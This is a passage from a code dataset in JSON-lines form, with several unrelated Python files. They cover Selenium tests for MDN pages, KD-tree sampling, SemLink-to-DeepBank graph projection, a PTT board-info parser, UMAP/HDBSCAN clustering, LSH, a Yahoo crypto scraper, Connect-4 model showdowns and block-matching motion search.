Cashflow\"] = 0\n self.forecast[\"Cashflows\"] = [[] for i in range(len(self.forecast))]\n\n for date in self.forecast.index:\n for cashflow in self.cashflows:\n if date in cashflow.frequency:\n self.forecast.loc[\n pd.to_datetime(date), \"Net Cashflow\"\n ] += (cashflow.sign * cashflow.amount)\n \"\"\"self.forecast.loc[pd.to_datetime(date), \"Cashflows\"] += [\n cashflow\n ]\"\"\"\n if cashflow.annual_rate_of_return:\n cashflow.amount += (\n cashflow.amount * cashflow.annual_rate_of_return\n )\n self.forecast[\"Cumulative Sum\"] = self.forecast[\n \"Net Cashflow\"\n ].cumsum()\n print(self.forecast)\n\n return self.forecast\n","repo_name":"quinn-p-mchugh/mint-fi-tracker","sub_path":"src/life.py","file_name":"life.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"16773233028","text":"import re\nimport pytest\nfrom utils.urls import assert_valid_url\nfrom pages.article import ArticlePage\n\nARTICLE_NAME = 'Send feedback (about|on) MDN'\n\n\n@pytest.mark.smoke\n@pytest.mark.nondestructive\ndef test_location(base_url, selenium):\n article_page = ArticlePage(selenium, base_url).open()\n page = article_page.header.open_feedback()\n assert re.match(ARTICLE_NAME + ' - The MDN project \\| MDN', selenium.title)\n assert re.match(ARTICLE_NAME, page.article_title_text)\n assert page.article_title_text in selenium.title\n\n\n@pytest.mark.smoke\n@pytest.mark.nondestructive\ndef test_feedback_layout(base_url, selenium):\n page = ArticlePage(selenium, base_url).open()\n assert page.is_article_displayed\n assert page.is_article_column_left_present\n assert page.is_article_column_content_present\n column_container = page.article_column_container_region\n assert column_container.is_expected_stacking\n\n\n@pytest.mark.smoke\n@pytest.mark.nondestructive\ndef test_page_links(base_url, selenium):\n page = ArticlePage(selenium, base_url).open()\n # get all page links\n article_links = page.article_link_list\n for link in article_links:\n this_link = link.get_attribute('href')\n # exclude IRC, we can't handle that protocol\n if not this_link.startswith('irc'):\n assert_valid_url(this_link, follow_redirects=True)\n","repo_name":"cndn/intelligent-code-completion","sub_path":"raw_data/41295_test_feedback.py","file_name":"41295_test_feedback.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"63"} +{"seq_id":"71992181320","text":"import numpy as np\n\nfrom numba_neighbors import binary_tree as bt\nfrom numba_neighbors import kd_tree as kd\n\nN = 100\nn = 50\nD = 1\n# rejection_r = 0.1\nquery_r = 0.3\nmax_neighbors = 100\nleaf_size = 16\n\nr2 = query_r ** 2\n\nnp.random.seed(124)\ndata = np.random.uniform(size=(N, D)).astype(kd.FLOAT_TYPE)\ndata.sort(axis=0)\nprint(data)\n\ntree = kd.KDTree(data, leaf_size=leaf_size)\n\nqr = tree.query_radius_bottom_up(data, r2, tree.get_node_indices(), max_neighbors)\n\nsr_rej = bt.rejection_ifp_sample_precomputed(qr.dists, qr.indices, qr.counts, n)\nprint(sr_rej.indices)\n\nsr = bt.ifp_sample_precomputed(qr.dists, qr.indices, qr.counts, n)\nprint(sr.indices)\n","repo_name":"jackd/numba-neighbors","sub_path":"example/compare_ifp.py","file_name":"compare_ifp.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"63"} +{"seq_id":"6676543989","text":"from nltk.tokenize.treebank import *\nfrom nltk.metrics.distance import edit_distance\nfrom annotation import *\nfrom copy import deepcopy\nfrom tqdm import tqdm\nfrom utils import *\nimport os, re, sys\nimport joblib, json\nimport logging\nimport stopit\nlogging.basicConfig(filename='projection_log.txt',\n filemode='a',\n format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',\n datefmt='%H:%M:%S',\n level=logging.CRITICAL)\n\nlogging.info(\"Running Urban Planning\")\n\nlogger = logging.getLogger('urbanGUI')\n\n#PTB tokenizer and detonkenizer\n#tokenizer = TreebankWordTokenizer()\n\n\ndef update_graph_old(sentence, eds:EDS, semlink:SemLinkAnnotation):\n tokens = tokenize(semlink)\n token_idx = int(semlink.token_no)\n target_verb = tokens[token_idx]\n begin_idx = len(detokenize(tokens[:token_idx]))\n end_idx = len(detokenize(tokens[:token_idx+1]))\n candidate_verb_nodes = get_verb_nodes(eds)\n \n source_verb_node = None\n #update predicate structure\n for verb_node in candidate_verb_nodes:\n s,e = verb_node.lnk.data\n # print(s,e)\n idx_pairs = sorted([(s,e), (begin_idx, end_idx)], key= lambda x : x[0])\n\n if idx_pairs[0][1] > idx_pairs[1][0]:\n #overlap confirmed\n source_verb_node = verb_node\n \n # print(begin_idx, end_idx)\n # print(source_verb_node)\n if source_verb_node == None:\n print(target_verb)\n print(sentence)\n return 'pass','pass','pass','pass'\n #raise Exception('empty verb???')\n updated_predicate = source_verb_node.predicate + '-fn.' + semlink.fn_frame\n\n #update edge roles\n target_dependencies = [x for x in semlink.dependencies if ';' in x]\n candidate_edges = deepcopy(source_verb_node.edges)\n\n source_verb_edges_dict = deepcopy(source_verb_node.edges)\n for dependency in target_dependencies:\n token_span = dependency.split('-')[0]\n start_token_idx = int(token_span.split(':')[0])\n end_token_idx = start_token_idx + int(token_span.split(':')[1]) + 1\n begin_idx = len(detokenize(tokens[:start_token_idx]))\n end_idx = len(detokenize(tokens[:end_token_idx]))\n fn_role = dependency.split(';')[-1]\n\n target_child_node = None\n\n for key in candidate_edges.keys():\n tmp_child_node = get_node(eds, candidate_edges[key])\n s,e = tmp_child_node.lnk.data\n idx_pairs = sorted([(s,e), (begin_idx, end_idx)], key= lambda x : x[0])\n\n if idx_pairs[0][1] > idx_pairs[1][0]:\n #overlap confirmed\n target_child_node = tmp_child_node\n new_key = key + '-fn.' + fn_role\n \n # print(dependency)\n # print(s,e)\n # print(begin_idx, end_idx)\n # print(new_key)\\\n \n #update edge_dict key\n source_verb_edges_dict[new_key] = source_verb_edges_dict.pop(key)\n # old_edge = (source_verb_node.id, key, tmp_child_node.id)\n # new_edge = (source_verb_node.id, new_key, tmp_child_node.id)\n # eds.edges.remove(old_edge)\n # eds.edges.append(new_edge)\n #TODO update edges\n\n break\n \n return source_verb_node.id, updated_predicate, source_verb_edges_dict\n\ndef update_graph(sentence, eds:EDS, semlink:SemLinkAnnotation, remaining_verb_nodes):\n tokens = tokenize(semlink)\n token_idx = int(semlink.token_no)\n target_verb = tokens[token_idx]\n begin_idx = len(detokenize(tokens[:token_idx]))\n end_idx = len(detokenize(tokens[:token_idx+1]))\n candidate_verb_nodes = deepcopy(remaining_verb_nodes)\n \n source_verb_node = None\n #update predicate structure\n for verb_node in candidate_verb_nodes:\n # s,e = verb_node.lnk.data\n # # print(s,e)\n # idx_pairs = sorted([(s,e), (begin_idx, end_idx)], key= lambda x : x[0])\n\n # if idx_pairs[0][1] > idx_pairs[1][0]:\n # #overlap confirmed\n # source_verb_node = verb_node\n if semlink.verb in verb_node.predicate:\n source_verb_node = verb_node\n candidate_verb_nodes.remove(verb_node)\n break\n # print(begin_idx, end_idx)\n # print(source_verb_node)\n if source_verb_node == None:\n # print(target_verb)\n # print(\"SENTENCE : \" + sentence)\n # print(get_file_name(semlink))\n logging.warning(get_file_name(semlink))\n logging.warning('no matching verb')\n return 'pass','pass','pass','pass'\n #raise Exception('empty verb???')\n updated_predicate = source_verb_node.predicate + '-fn.' + semlink.fn_frame\n\n #update edge roles\n target_dependencies = [x for x in semlink.dependencies if ';' in x.split('-')[-1]]\n arg_assosicated_strings = get_children_strings(sentence, eds, source_verb_node)\n #print(arg_assosicated_strings)\n source_verb_edges_dict = deepcopy(source_verb_node.edges)\n\n dependency_edit_distance_comparision_dict = {} \n\n for dependency in target_dependencies:\n token_intervals = dependency.split('-')[0].replace(';','*').replace(',','*').split('*')\n concate_string = \"\"\n for interval in token_intervals:\n start_token_idx = int(interval.split(':')[0])\n end_token_idx = start_token_idx + int(interval.split(':')[1]) + 1\n concate_string += detokenize(tokens[start_token_idx : end_token_idx])\n \n fn_role = dependency.split(';')[-1]\n\n target_child_node = None\n\n max_len = len(sentence)\n # for key in arg_assosicated_strings:\n # if len(arg_assosicated_strings[key]) > max_len:\n # max_len = len(arg_assosicated_strings[key])\n \n for key in arg_assosicated_strings:\n arg_assosicated_strings[key] += '='*(max_len - len(arg_assosicated_strings[key]))\n\n edit_distances = sorted([(key, edit_distance(concate_string, arg_assosicated_strings[key])) for key in arg_assosicated_strings.keys()], key= lambda x : x[1])\n dependency_edit_distance_comparision_dict[fn_role] = edit_distances\n \n #search for global minmum edit_distance between text and dependency of a given arg name\n #print(dependency_edit_distance_comparision_dict)\n for key in arg_assosicated_strings.keys():\n if len(dependency_edit_distance_comparision_dict) == 0:\n logging.warning('Semlink need an extra arg', source_verb_node, source_verb_node.edges, semlink.file_path)\n break\n minimum = 1000000\n best_fit_dep = None\n for dep in dependency_edit_distance_comparision_dict.keys():\n all_edit = dependency_edit_distance_comparision_dict[dep]\n for edit in all_edit:\n if edit[0] == key:\n if edit[1] < minimum:\n minimum = edit[1]\n best_fit_dep = dep\n if best_fit_dep == None:\n logging.warning('Semlink need an extra arg', source_verb_node, source_verb_node.edges, semlink.file_path)\n else:\n dependency_edit_distance_comparision_dict.pop(best_fit_dep)\n new_key = key + '-fn.' + best_fit_dep\n source_verb_edges_dict[new_key] = source_verb_edges_dict.pop(key)\n\n if len(dependency_edit_distance_comparision_dict) > 0:\n logging.warning('EDS need an extra arg', source_verb_node, source_verb_node.edges, semlink.file_path)\n # try:\n # old_key = edit_distances[0][0]\n\n # new_key = old_key + '-fn.' + fn_role\n # arg_assosicated_strings.pop(old_key)\n # source_verb_edges_dict[new_key] = source_verb_edges_dict.pop(old_key)\n # if len(arg_assosicated_strings) == 0:\n # break\n # #print(new_key)\n # except:\n # #exit() annotation mismatch\n # logging.warning('annotation mismatch', edit_distances, source_verb_node, source_verb_node.edges, sentence, semlink.file_path)\n\n \n \n return source_verb_node.id, updated_predicate, source_verb_edges_dict, candidate_verb_nodes\n\nif __name__ == \"__main__\":\n # semlinks_data = [line.rstrip() for line in open('1.2.2c.okay.txt')]\n # deepbank_files = os.listdir('deepbank_raw')\n # semlinks_dict = {}\n # counter = 0\n # for d in tqdm(semlinks_data, desc='Filtering Redundant Semlink Annotations'):\n # semlink = SemLinkAnnotation(d)\n # filename = get_file_name(semlink)\n # if filename in deepbank_files and os.path.exists(semlink.file_path):\n # if not(filename in semlinks_dict.keys()):\n # semlinks_dict[filename] = []\n # semlinks_dict[filename].append(semlink)\n # counter += 1\n \n # print(counter)\n # with open('semlink_dict.pkl', 'wb') as f:\n # joblib.dump(semlinks_dict, f)\n\n with open('semlink_dict.pkl', 'rb') as f:\n semlinks_dict = joblib.load(f)\n\n total_unmatch = 0\n total_cannot_load = 0\n total_timeout = 0\n output_dict = {}\n for f in tqdm(semlinks_dict.keys(), desc='Processing Files'):\n skip_flag = False\n try:\n current_deepbank = sentence_eds(os.path.join('deepbank_raw',f))\n except:\n logging.warning('Cannot Load {}'.format(f))\n total_cannot_load += 1\n skip_flag = True\n if skip_flag == False:\n verb_nodes = get_verb_nodes(current_deepbank.eds)\n for semlink in semlinks_dict[f]:\n if not(verb_nodes == 'pass'):\n with stopit.ThreadingTimeout(2) as context_manager:\n new_id, new_pred, new_edges, verb_nodes = update_graph(current_deepbank.sentence, current_deepbank.eds, semlink, verb_nodes)\n if context_manager.state == context_manager.EXECUTED:\n if not(verb_nodes == 'pass'):\n current_deepbank.update_text(new_id, new_pred, new_edges)\n else:\n total_unmatch += 1\n elif context_manager.state == context_manager.TIMED_OUT:\n logging.warning('Possible Loop in {}'.format(f))\n total_timeout +=1\n\n output_dict[f] = current_deepbank.eds_text\n\n \n print(total_unmatch, total_cannot_load, total_timeout)\n with open(os.path.join('deepbank_projected', 'projected.pkl'), 'wb') as f:\n joblib.dump(output_dict, f)\n\n with open(os.path.join('deepbank_projected', 'projected.json'), 'w') as f:\n f.write(json.dumps(output_dict, indent=2))\n f.close()\n \n \n","repo_name":"SpaceHunterInf/frame_net_project","sub_path":"batch_projection.py","file_name":"batch_projection.py","file_ext":"py","file_size_in_byte":10699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"14937689931","text":"import re\n\ntry:\n from . import data_type\n from . import i18n\n from . import connect_core\n from . import log\n from . import exceptions\n from . import command\nexcept ModuleNotFoundError:\n import data_type\n import i18n\n import connect_core\n import log\n import exceptions\n import command\n\n\ndef get_board_info(\n api,\n board: str,\n call_by_others: bool) -> None:\n\n cmd_list = []\n cmd_list.append(command.GoMainMenu)\n cmd_list.append('qs')\n cmd_list.append(board)\n cmd_list.append(command.Enter)\n cmd_list.append(command.Ctrl_C * 2)\n cmd_list.append(command.Space)\n cmd = ''.join(cmd_list)\n\n if call_by_others:\n log_level = log.level.DEBUG\n else:\n log_level = log.level.INFO\n\n target_list = [\n connect_core.TargetUnit(\n i18n.IntoBoard,\n [\n '文章選讀',\n '進板畫面'\n ],\n break_detect=True,\n log_level=log_level\n ),\n ]\n\n api.connect_core.send(\n cmd,\n target_list\n )\n\n ori_screen = api.connect_core.get_screen_queue()[-1]\n # print(OriScreen)\n nuser = ori_screen.split('\\n')[2]\n # print(Nuser)\n if '[靜]' in nuser:\n online_user = 0\n else:\n if '編號' not in nuser or '人氣' not in nuser:\n raise exceptions.NoSuchBoard(api.config, board)\n pattern = re.compile('[\\d]+')\n r = pattern.search(nuser)\n if r is None:\n raise exceptions.NoSuchBoard(api.config, board)\n # 減一是把自己本身拿掉\n online_user = int(r.group(0)) - 1\n log.show_value(\n api.config,\n log.level.DEBUG,\n '人氣',\n online_user\n )\n\n target_list = [\n connect_core.TargetUnit(\n i18n.ReadingBoardInfo,\n '任意鍵繼續',\n break_detect=True,\n log_level=log_level\n ),\n ]\n\n api.connect_core.send(\n 'i',\n target_list\n )\n\n ori_screen = api.connect_core.get_screen_queue()[-1]\n # print(ori_screen)\n\n p = re.compile('《(.+)》看板設定')\n r = p.search(ori_screen)\n if r is not None:\n boardname = r.group(0)[1:-5].strip()\n log.show_value(\n api.config,\n log.level.DEBUG,\n '看板名稱',\n boardname\n )\n\n if boardname != board:\n raise exceptions.NoSuchBoard(api.config, board)\n\n p = re.compile('中文敘述: (.+)')\n r = p.search(ori_screen)\n if r is not None:\n chinese_des = r.group(0)[5:].strip()\n log.show_value(\n api.config,\n log.level.DEBUG,\n '中文敘述',\n chinese_des\n )\n\n p = re.compile('板主名單: (.+)')\n r = p.search(ori_screen)\n if r is not None:\n moderator_line = r.group(0)[5:].strip()\n if '(無)' in moderator_line:\n moderators = []\n else:\n moderators = moderator_line.split('/')\n for moderator in moderators.copy():\n check = True\n for c in moderator:\n if len(c.encode('big5')) > 1:\n check = False\n break\n if not check:\n moderators.remove(moderator)\n\n log.show_value(\n api.config,\n log.level.DEBUG,\n '板主名單',\n moderators\n )\n\n open_status = ('公開狀態(是否隱形): 公開' in ori_screen)\n log.show_value(\n api.config,\n log.level.DEBUG,\n '公開狀態',\n open_status\n )\n\n into_top_ten_when_hide = (\n '隱板時 可以 進入十大排行榜' in ori_screen\n )\n log.show_value(\n api.config,\n log.level.DEBUG,\n '隱板時可以進入十大排行榜',\n into_top_ten_when_hide\n )\n\n non_board_members_post = ('開放 非看板會員發文' in ori_screen)\n log.show_value(\n api.config,\n log.level.DEBUG,\n '非看板會員發文',\n non_board_members_post\n )\n\n reply_post = ('開放 回應文章' in ori_screen)\n log.show_value(\n api.config,\n log.level.DEBUG,\n '回應文章',\n reply_post\n )\n\n self_del_post = ('開放 自刪文章' in ori_screen)\n log.show_value(\n api.config,\n log.level.DEBUG,\n '自刪文章',\n self_del_post\n )\n\n push_post = ('開放 推薦文章' in ori_screen)\n log.show_value(\n api.config,\n log.level.DEBUG,\n '推薦文章',\n push_post\n )\n\n boo_post = ('開放 噓文' in ori_screen)\n log.show_value(\n api.config,\n log.level.DEBUG,\n '噓文',\n boo_post\n )\n\n # 限制 快速連推文章, 最低間隔時間: 5 秒\n # 開放 快速連推文章\n\n fast_push = ('開放 快速連推文章' in ori_screen)\n log.show_value(\n api.config,\n log.level.DEBUG,\n '快速連推文章',\n fast_push\n )\n\n if not fast_push:\n p = re.compile('最低間隔時間: [\\d]+')\n r = p.search(ori_screen)\n if r is not None:\n min_interval = r.group(0)[7:].strip()\n min_interval = int(min_interval)\n else:\n min_interval = 0\n log.show_value(\n api.config,\n log.level.DEBUG,\n '最低間隔時間',\n min_interval\n )\n else:\n min_interval = 0\n\n # 推文時 自動 記錄來源 IP\n # 推文時 不會 記錄來源 IP\n push_record_ip = ('推文時 自動 記錄來源 IP' in ori_screen)\n log.show_value(\n api.config,\n log.level.DEBUG,\n '記錄來源 IP',\n push_record_ip\n )\n\n # 推文時 對齊 開頭\n # 推文時 不用對齊 開頭\n push_aligned = ('推文時 對齊 開頭' in ori_screen)\n log.show_value(\n api.config,\n log.level.DEBUG,\n '對齊開頭',\n push_aligned\n )\n\n # 板主 可 刪除部份違規文字\n moderator_can_del_illegal_content = (\n '板主 可 刪除部份違規文字' in ori_screen\n )\n log.show_value(\n api.config,\n log.level.DEBUG,\n '板主可刪除部份違規文字',\n moderator_can_del_illegal_content\n )\n\n # 轉錄文章 會 自動記錄,且 需要 發文權限\n tran_post_auto_recorded_and_require_post_permissions = (\n '轉錄文章 會 自動記錄,且 需要 發文權限' in ori_screen\n )\n log.show_value(\n api.config,\n log.level.DEBUG,\n '轉錄文章 會 自動記錄,且 需要 發文權限',\n tran_post_auto_recorded_and_require_post_permissions\n )\n\n cool_mode = (\n '未 設為冷靜模式' not in ori_screen\n )\n log.show_value(\n api.config,\n log.level.DEBUG,\n '冷靜模式',\n cool_mode\n )\n\n require18 = (\n '禁止 未滿十八歲進入' in ori_screen\n )\n\n log.show_value(\n api.config,\n log.level.DEBUG,\n '禁止未滿十八歲進入',\n require18\n )\n\n p = re.compile('登入次數 [\\d]+ 次以上')\n r = p.search(ori_screen)\n if r is not None:\n require_login_time = r.group(0).split(' ')[1]\n require_login_time = int(require_login_time)\n else:\n require_login_time = 0\n log.show_value(\n api.config,\n log.level.DEBUG,\n '發文限制登入次數',\n require_login_time\n )\n\n p = re.compile('退文篇數 [\\d]+ 篇以下')\n r = p.search(ori_screen)\n if r is not None:\n require_illegal_post = r.group(0).split(' ')[1]\n require_illegal_post = int(require_illegal_post)\n else:\n require_illegal_post = 0\n log.show_value(\n api.config,\n log.level.DEBUG,\n '發文限制退文篇數',\n require_illegal_post\n )\n\n board_info = data_type.BoardInfo(\n boardname,\n online_user,\n chinese_des,\n moderators,\n open_status,\n into_top_ten_when_hide,\n non_board_members_post,\n reply_post,\n self_del_post,\n push_post,\n boo_post,\n fast_push,\n min_interval,\n push_record_ip,\n push_aligned,\n moderator_can_del_illegal_content,\n tran_post_auto_recorded_and_require_post_permissions,\n cool_mode,\n require18,\n require_login_time,\n require_illegal_post,\n )\n return board_info\n","repo_name":"akpotter/PyPtt","sub_path":"PyPtt/_api_get_board_info.py","file_name":"_api_get_board_info.py","file_ext":"py","file_size_in_byte":8464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"63"} +{"seq_id":"31080931541","text":"import pandas as pd\nimport numpy as np\nfrom cuml.manifold.umap import UMAP as cumlUMAP\nfrom cuml.cluster import HDBSCAN\nfrom typing import Any, List, Dict, Tuple\n\nclass Clustering:\n def __init__(self, config: Any):\n self.config=config\n self.reduction_model = cumlUMAP(n_neighbors=self.config.n_neighbours, min_dist=self.config.min_distance, n_components=self.config.n_components, init=\"spectral\")\n self.cluster_model = HDBSCAN(\n min_samples=self.config.min_samples, \n min_cluster_size=self.config.min_cluster_size, \n max_cluster_size=self.config.max_cluster_size, \n cluster_selection_epsilon=self.config.cluster_selection_epsilon,\n metric=self.config.metric,\n alpha=self.config.alpha,\n p=self.config.p,\n cluster_selection_method=self.config.cluster_selection_method,\n allow_single_cluster=self.config.allow_single_cluster,\n gen_min_span_tree=self.config.gen_min_span_tree \n )\n\n def convert_to_numpy_arrays(self, doc_emb: List)->Tuple[List, np.array]:\n id_list = []\n emb_list = []\n # only takes last element of doc_emb\n for doc_dict in doc_emb:\n id_list = id_list + list(doc_dict.keys())\n for doc in doc_dict.keys():\n emb_list.append(doc_dict[doc].detach().numpy())\n doc_arrays = np.array(emb_list)\n print(f\"id length: {len(id_list)}\")\n print(\"doc array size: \", doc_arrays.shape)\n return id_list, doc_arrays\n\n def umap_reduce(self, doc_arrays: np.array):\n return self.reduction_model.fit_transform(doc_arrays) \n\n def cluster(self, embedding: np.array):\n return self.cluster_model.fit_predict(embedding)\n\n def reduce_and_cluster(self, doc_emb: List)->pd.DataFrame:\n print(\"umap reduction...\")\n id_list, doc_arrays = self.convert_to_numpy_arrays(doc_emb)\n g_embedding = self.umap_reduce(doc_arrays)\n print(\"clustering...\")\n labels = self.cluster(g_embedding)\n cluster_df = pd.DataFrame()\n cluster_df['id'] = id_list\n cluster_df['emb'] = doc_arrays.tolist()\n cluster_df['labels'] = labels\n return cluster_df\n\n def group_ids_by_labels(self, cluster_df: pd.DataFrame)->Dict:\n cluster_labels = cluster_df['labels'].unique()\n full_dict = {}\n for label in cluster_labels:\n cluster_ids = cluster_df[cluster_df['labels']==label]['id'].tolist()\n if label==-1:\n centroids = []\n else:\n centroids = np.mean(cluster_df[cluster_df['labels']==label]['emb'].tolist(),axis=0).tolist()\n cluster_dict = {\"id_list\":cluster_ids, \"centroid\":centroids}\n full_dict[str(label)] = cluster_dict\n return full_dict\n\n def generate_clusters(self, doc_emb):\n cluster_df = self.reduce_and_cluster(doc_emb)\n return self.group_ids_by_labels(cluster_df)","repo_name":"DinoHub/graph-tools","sub_path":"clustering/src/models/umap_hdbscan.py","file_name":"umap_hdbscan.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29022632309","text":"import math\nimport itertools\nimport collections\nfrom compare_sets import CompareSets\n\nclass LSH:\n \n def __init__(self, band_num=100, threshold=0.8):\n self.band_num = band_num\n self.threshold = threshold\n\n def similar(self, signature_df):\n similar_documents = []\n \n for candidate_1, candidate_2 in self.get_candidates(signature_df):\n similarity = CompareSets.compare(\n signature_df[candidate_1].tolist(),\n signature_df[candidate_2].tolist())\n if similarity >= self.threshold:\n similar_documents.append((candidate_1, candidate_2))\n\n return similar_documents\n \n def get_candidates(self, signature_df):\n num_of_signatures, num_of_documents = signature_df.shape\n rows_in_band = math.ceil(num_of_signatures / self.band_num)\n \n candidate_pairs = set()\n for i in range(self.band_num):\n band = signature_df[i*rows_in_band: (i+1)*rows_in_band]\n\n buckets = collections.defaultdict(set)\n for j in range(num_of_documents):\n band_id = tuple(band.iloc[:,j].tolist())\n buckets[band_id].add(j)\n\n for bucket in buckets.values():\n for pair in itertools.combinations(bucket, 2):\n candidate_pairs.add(pair)\n\n return candidate_pairs\n\n'''\nimport numpy as np\nlsh = LSH(2, 0.34)\narr = np.array([\n [\"7\", \"7\", \"c\"],\n [\"4\", \"4\", \"f\"], #rows are hashes\n [\"s\", \"a\", \"a\"]] #columns are documents\n)\nprint(lsh.similar(arr))\n'''","repo_name":"bubriks/ID2222","sub_path":"Homework 1/lsh.py","file_name":"lsh.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"18441226631","text":"import requests\nimport bs4\nimport psycopg2 \nfrom datetime import datetime\n\n\ndef scrape_crypto(cur, conn):\n target_url = 'https://finance.yahoo.com/cryptocurrencies'\n res = requests.get(target_url)\n page = bs4.BeautifulSoup(res.content, 'html.parser')\n\n names = [name.text for name in page.find_all('td', attrs={'aria-label':'Name'})]\n prices = [float(price.find('span').text.replace(',','')) for price in page.find_all('td', attrs={'aria-label':'Price (Intraday)'})]\n changes = [float(change.text) for change in page.find_all('td', attrs={'aria-label':'Change'})]\n percent_changes = [float(percent_change.text.replace('%', '').replace(',', '')) for percent_change in page.find_all('td', attrs={'aria-label':'% Change'})]\n market_caps = [market_cap.text for market_cap in page.find_all('td', attrs={'aria-label':'Market Cap'})]\n total_volumes = [total_volume.text for total_volume in page.find_all('td', attrs={'aria-label':'Volume in Currency (Since 0:00 UTC)'})]\n circulate_supplys = [circulate_supply.text for circulate_supply in page.find_all('td', attrs={'aria-label':'Circulating Supply'})]\n\n\n current_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n for i in range(0, len(names)):\n cur.execute('INSERT INTO crypto (name, price, change, percent_change, market_cap, total_volume, circulate_supply, ts) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)',\n (names[i], prices[i], changes[i], percent_changes[i], market_caps[i], total_volumes[i], circulate_supplys[i], current_time))\n\n conn.commit()\n\n\n\n","repo_name":"tharidlynn/gdelt","sub_path":"yahoo/yahoo/crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"10279954928","text":"import c4nn.mc as mc, c4nn.engine as engine, c4nn.config as config, pdb\nfrom tqdm import tqdm\n\ndef head2Head(isSelfPlayShowDown, exploratoryFlags, name1, name2, champVal, champPol, challVal, challPol, showDownSize, trainingRecursionCount1, trainingRecursionCount2 = None): # play selected amount of games between two models, return win counts\n\tif trainingRecursionCount2 == None:\n\t\ttrainingRecursionCount2 = trainingRecursionCount1\n\tchallWins = 0\n\tdrawCount = 0\n\tchampWins = 0\n\t# showTree = False\n\t# showBoard = True\n\t# treeDepth = 2\n\t\n\tprint(\"Showdown!!!\")\n\tfor _ in tqdm(range(showDownSize)):\n\t\tisRedTurn = _ % 2 == 0 # toggle first move\n\t\tcurrBoardState = engine.board()\n\t\tturnCount = 0\n\t\twhile True:\n\t\t\tcurrPlayer = mc.monteTree(currBoardState, True, champPol, champVal) if isRedTurn else mc.monteTree(currBoardState, False, challPol, challVal)\n\t\t\tfor _2 in range(trainingRecursionCount1 if isRedTurn else trainingRecursionCount2):\n\t\t\t\tcurrPlayer.nnSelectRec(currPlayer.root)\n\t\t\t# if showTree:\n\t\t\t\t# print(currPlayer.__str__(treeDepth))\n\t\t\ttemp = mc.monteTree.turnCountToTemp(turnCount) if exploratoryFlags[0] and isRedTurn or exploratoryFlags[1] and not isRedTurn else 1\n\t\t\tif temp < 1:\n\t\t\t\tcurrBoardState, rowNum, colNum = currPlayer.exploratoryMove(temp)\n\t\t\telse:\n\t\t\t\tcurrBoardState, rowNum, colNum = currPlayer.makeMove()\n\t\t\t# if showBoard:\n\t\t\t\t# currBoardState.printBoard()\n\t\t\t# pdb.set_trace()\n\t\t\tif currBoardState.checkWin(rowNum, colNum, isRedTurn):\n\t\t\t\tif isRedTurn:\n\t\t\t\t\tprint(\"\\n\" + name1 + \" wins!\")\n\t\t\t\t\tchampWins += 1\n\t\t\t\telse:\n\t\t\t\t\tprint(\"\\n\" + name2 + \" wins!\")\n\t\t\t\t\tchallWins += 1\n\t\t\t\tbreak\n\t\t\telif currBoardState.checkDraw():\n\t\t\t\tprint(\"\\nDraw!\")\n\t\t\t\tdrawCount += 1\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tisRedTurn = not isRedTurn\n\t\t\t\tturnCount += 1\n\t\tprint('''\tCurrent Stats:\n\t\t{} Wins: {}\n\t\t{} Wins: {}\n\t\tDraws: {}'''.format(name1, champWins, name2, challWins, drawCount))\n\t\tif isSelfPlayShowDown:\n\t\t\tif ((champWins) * config.winRatio) > (showDownSize - champWins - drawCount):\n\t\t\t\tprint(\"Challenger victory no longer possible. Ending showdown.\")\n\t\t\t\tbreak\n\t\t\telif ((challWins) / config.winRatio) > (showDownSize - challWins - drawCount):\n\t\t\t\tprint(\"Challenger wins! Ending showdown.\")\n\t\t\t\tbreak\n\tprint('''\tEnd Stats:\n\t\tGames Played: {}\n\t\t{} Wins: {}\n\t\t{} Wins: {}\n\t\tDraws: {}'''.format(champWins + challWins + drawCount, name1, champWins, name2, challWins, drawCount))\n\t\t\n\treturn champWins, challWins, drawCount","repo_name":"sgawalsh/djangoWebsite","sub_path":"c4nn/head2Head.py","file_name":"head2Head.py","file_ext":"py","file_size_in_byte":2420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29737696096","text":"import numpy as np\nfrom math import log2\n\n\nclass LogarithmicSearch:\n\n def calcMae(self, blockSize, blockPoints, regionPoints):\n total = 0\n for x in range(blockSize):\n for y in range(blockSize):\n total += abs(\n self._I1[int(regionPoints[0]) + x][int(regionPoints[1]) + y] - self._I2[blockPoints[0] + x][blockPoints[1] + y])\n\n return total / blockSize ** 2\n\n def logPoints(self, blockSize, regionSize,\n regionTopLeftCorner):\n\n k = (regionSize / blockSize) / 4\n points = []\n for i in range(3):\n for j in range(3):\n points.append([(i + 1) * k * blockSize + regionTopLeftCorner[0] - blockSize / 2,\n (j + 1) * k * blockSize + regionTopLeftCorner[1] - blockSize / 2])\n\n return points\n\n def regionStart(self, blockTopLeftCorner, blockSize, regionSize):\n points = []\n for i in range(2):\n if blockTopLeftCorner[i] - (regionSize - blockSize) / 2 < 0:\n points.append(0)\n elif blockTopLeftCorner[i] + (regionSize + blockSize) / 2 > len(self._I1):\n val = blockTopLeftCorner[i] - (regionSize - blockSize) / 2\n val += len(self._I1) - (blockTopLeftCorner[i] + (regionSize + blockSize) / 2)\n points.append(val)\n else:\n points.append(blockTopLeftCorner[i] - (regionSize - blockSize) / 2)\n\n return np.array(points)\n\n def start(self, blockSize, regionSize):\n vectors = []\n\n for i in range(int(len(self._I2) / blockSize)):\n vectorsRow = []\n for j in 